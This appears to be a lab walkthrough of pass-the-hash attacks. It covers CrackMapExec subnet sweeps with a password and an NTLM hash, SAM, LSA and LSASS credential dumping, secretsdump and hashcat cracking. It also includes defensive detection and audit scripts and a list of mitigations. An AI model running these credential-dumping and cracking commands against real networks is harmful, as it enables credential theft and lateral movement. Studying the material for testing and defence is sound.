Pass Attacks
Introduction
In cybersecurity, pass attacks exploit the authentication mechanisms of networked systems by using hash credentials rather than plaintext passwords. These attacks allow lateral movement within a network, often bypassing conventional security restrictions.
Methodology
Step 1: Initial Setup with CrackMapExec
CrackMapExec is a powerful post-exploitation tool for enumerating and exploiting Active Directory (AD) environments. First, we ensure that CrackMapExec is functioning correctly by viewing the available options:
crackmapexec --help

Step 2: Running SMB Commands
To explore SMB (Server Message Block) shares and services, we can start by listing the help options specific to SMB:
crackmapexec smb --help

We then connect to the network, specifying the target subnet and credentials. In this phase, we successfully obtain the credentials of the Punisher and Spiderman machines, allowing access to additional resources and revealing valuable information about other accessible systems on the network.
sudo crackmapexec smb 192.168.92.0/24 -u fcastle -d MARVEL.local -p Password1
The command uses CrackMapExec to scan the 192.168.92.0/24 subnet for SMB services. It attempts to authenticate with the username fcastle and password Password1 on the domain MARVEL.local. If successful, it enumerates SMB shares and gathers information about the devices in the network. This is typically used for network reconnaissance and SMB vulnerability testing during penetration testing.

Step 3: Testing Authentication with Hashes
We use the -H option to leverage hash-based authentication, which specifies NTLM hash values instead of plain-text passwords. This technique is crucial in pass-the-hash attacks, where plaintext passwords are unnecessary.
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth
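As an added detection example (not from the original page), the Python below flags the footprint a hash-authenticated sweep like the one in Steps 3 to 7 leaves in Windows Security logs: one source address logging on as one account to many different hosts over NTLM network logons within a few seconds. The event records, their field names and the host names are constructed sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4624 records, already normalised to dicts.
# The field names are an assumption about the SIEM export, not a Windows standard.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "event_id": 4624, "host": "PUNISHER",
     "user": "administrator", "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.92.50"},
    {"time": "2024-05-01T10:00:04", "event_id": 4624, "host": "SPIDERMAN",
     "user": "administrator", "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.92.50"},
    {"time": "2024-05-01T10:00:09", "event_id": 4624, "host": "HYDRA-DC",
     "user": "administrator", "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.92.50"},
    # Interactive Kerberos logon by a domain user: filtered out.
    {"time": "2024-05-01T10:01:00", "event_id": 4624, "host": "SPIDERMAN",
     "user": "pparker", "logon_type": 2, "auth_pkg": "Kerberos", "src_ip": "192.168.92.137"},
    # Two NTLM logons 20 minutes apart: too slow and too few hosts to be a sweep.
    {"time": "2024-05-01T10:05:00", "event_id": 4624, "host": "PUNISHER",
     "user": "fcastle", "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.92.128"},
    {"time": "2024-05-01T10:25:00", "event_id": 4624, "host": "SPIDERMAN",
     "user": "fcastle", "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.92.128"},
]


def find_ntlm_sweeps(events, window=timedelta(minutes=5), min_hosts=3):
    """Return (src_ip, user, sorted hosts) for every source address that logged on
    as one account to at least min_hosts distinct hosts over NTLM network logons
    (event 4624, LogonType 3, NTLM package) inside a single time window."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4624 and ev["logon_type"] == 3 and ev["auth_pkg"] == "NTLM":
            by_source[(ev["src_ip"], ev["user"])].append(
                (datetime.fromisoformat(ev["time"]), ev["host"]))
    hits = []
    for (src_ip, user), logons in by_source.items():
        logons.sort()
        best = set()
        for i, (start, _) in enumerate(logons):
            # Distinct hosts reached in the window opening at this logon.
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            hits.append((src_ip, user, sorted(best)))
    return hits


if __name__ == "__main__":
    for src_ip, user, hosts in find_ntlm_sweeps(SAMPLE_EVENTS):
        print(f"possible pass-the-hash sweep: {src_ip} as {user} -> {hosts}")
```

Local accounts used with --local-auth cannot authenticate with Kerberos, so these logons always arrive as NTLM, which is why the filter keys on the authentication package.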

Step 4: Enumerating SAM Accounts and Shares
SAM (Security Account Manager) databases and shared folders are common targets in network environments. Enumerating these allows us to view stored credentials and shared resources, providing insight into the network’s structure.
SAM Enumeration
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --sam

Shared Folders Enumeration
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --shares

Step 5: Local Security Authority (LSA) Enumeration
The Local Security Authority (LSA) maintains various security policies and account information. Accessing it provides further credential-based access.
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth --lsa


Step 6: Listing All Available SMB Shares
We use the -L option to enumerate SMB shares across the network. This step provides visibility into the shared resources accessible to the specified user, offering insight into sensitive data or high-privilege directories.
crackmapexec smb -L


Step 7: Running LSASSY Module
Lsassy is an extraction tool that works alongside CrackMapExec to dump credentials from the Local Security Authority Subsystem Service (LSASS).
sudo crackmapexec smb 192.168.92.0/24 -u administrator -H <hash> --local-auth -M lsassy

Step 8: Database Enumeration and Switch to CMEDB
We switch to CMEDB, CrackMapExec’s integrated database module, to manage and review data on the hosts we have touched. This module allows us to view host details and extracted data.
Enter CMEDB
cmedb

Check Hosts and Shares
hosts

shares

Dumping and Cracking Hashes with Secrets Dump
SecretsDump is utilized to retrieve hashed credentials from systems, providing direct access to SAM hashes.
1. Dumping Hashes with Credentials
secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.92.128

2. Using Alternate Credentials
secretsdump.py MARVEL.local/pparker:'Password1'@192.168.92.137

3. Dumping Hashes with a Provided Hash
secretsdump.py administrator@192.168.92.128 -hashes <hash>

Cracking Retrieved Hashes with Hashcat
Once hashes are extracted, we proceed with cracking them to reveal passwords. First, create a file to hold the hashes:
· Create a Hash File
mousepad ntlm.txt

Then, paste the copied hash into this file.

· Verify NTLM Hash Format
hashcat --help | grep NTLM

· Crack Hashes with Hashcat
hashcat -m 1000 ntlm.txt rockyou.txt
hashcat: This is the tool used for high-performance password cracking. Hashcat supports various hashing algorithms and allows us to perform dictionary, brute-force, and hybrid attacks.
-m 1000: The -m option specifies the hashing algorithm. In this case, 1000 is the mode identifier for NTLM hashes. NTLM is a hash format used mainly by Windows operating systems to store password hashes. The mode 1000 tells Hashcat that the hashes in the file ntlm.txt are NTLM hashes and to use the appropriate algorithm.
ntlm.txt: This is the input file containing the NTLM hashes to be cracked.
rockyou.txt: This is the wordlist or dictionary file used by Hashcat to attempt cracking the hashes.


Mitigations
Pass the Hash / Pass the Password
While it is challenging to fully prevent pass attacks, several mitigations can significantly raise the difficulty for attackers:
1. Limit Account Re-use
o Unique Passwords for Each Local Administrator Account: Avoid re-using the same password across different local administrator accounts.
o Disable Guest and Built-In Administrator Accounts: Disabling these accounts reduces attack entry points, as they are often default targets.
o Apply the Principle of Least Privilege: Restrict local administrator rights to only essential personnel and systems to minimize the risk and impact of an account being compromised.
2. Utilize Strong Passwords
o Enforce Long and Complex Passwords: Require passwords longer than 14 characters with a mix of upper and lower case letters, numbers, and symbols. Stronger passwords increase the difficulty of successful brute force and pass-the-hash attacks.
3. Multi-Factor Authentication (MFA)
o Adding MFA, especially for privileged accounts, greatly enhances security by requiring additional verification steps beyond just the password or hash.
4. Network Segmentation and Isolation
o Separate High-Risk and Critical Systems: Segment the network so that high-value assets, such as domain controllers and critical servers, are isolated from other network zones. This restricts lateral movement if one account or machine is compromised.
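The first mitigation above (unique local administrator passwords) can be checked directly, because NT hashes are unsalted: two hosts whose local accounts store the same NT hash share a password, which is exactly what lets a hash captured on one host be passed to the other. The Python below is an added audit example, not from the original page; it parses the user:rid:lmhash:nthash::: line format that secretsdump prints and reports cross-host re-use, empty passwords and accounts that still store an LM hash. The per-host dumps are constructed sample data with placeholder hash values.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed per-host SAM dumps in the user:rid:lmhash:nthash::: line format that
# secretsdump prints. The hash values are placeholders, not real credentials.
SAMPLE_DUMPS = {
    "PUNISHER": [
        f"Administrator:500:{EMPTY_LM}:{'1' * 32}:::",
        f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    ],
    "SPIDERMAN": [
        f"Administrator:500:{EMPTY_LM}:{'1' * 32}:::",  # same password as PUNISHER
        f"svc_backup:1001:{'a' * 32}:{'2' * 32}:::",     # LM hash still stored
    ],
    "HYDRA-DC": [
        f"Administrator:500:{EMPTY_LM}:{'3' * 32}:::",
    ],
}


def parse_dump_line(line):
    """Split one pwdump-style line into (user, rid, lmhash, nthash)."""
    user, rid, lm, nt = line.rstrip(":").split(":")
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError(f"malformed hash line: {line}")
    return user, int(rid), lm.lower(), nt.lower()


def audit_dumps(dumps):
    """Report NT hashes shared across hosts (password re-use), accounts with an
    empty password, and accounts whose LM hash is still populated."""
    by_nt = defaultdict(list)
    empty, lm_enabled = [], []
    for host, lines in dumps.items():
        for line in lines:
            user, _rid, lm, nt = parse_dump_line(line)
            if nt == EMPTY_NT:
                empty.append(f"{host}\\{user}")
            else:
                by_nt[nt].append(f"{host}\\{user}")
            if lm != EMPTY_LM:
                lm_enabled.append(f"{host}\\{user}")
    # Re-use only matters when the same hash appears on more than one host.
    reuse = {nt: sorted(accts) for nt, accts in by_nt.items()
             if len({a.split("\\")[0] for a in accts}) > 1}
    return {"reuse": reuse, "empty_password": empty, "lm_enabled": lm_enabled}


if __name__ == "__main__":
    for category, items in audit_dumps(SAMPLE_DUMPS).items():
        print(category, items)
```

A deployment of Windows LAPS, which sets a different random local Administrator password on every host, should make the reuse report come back empty.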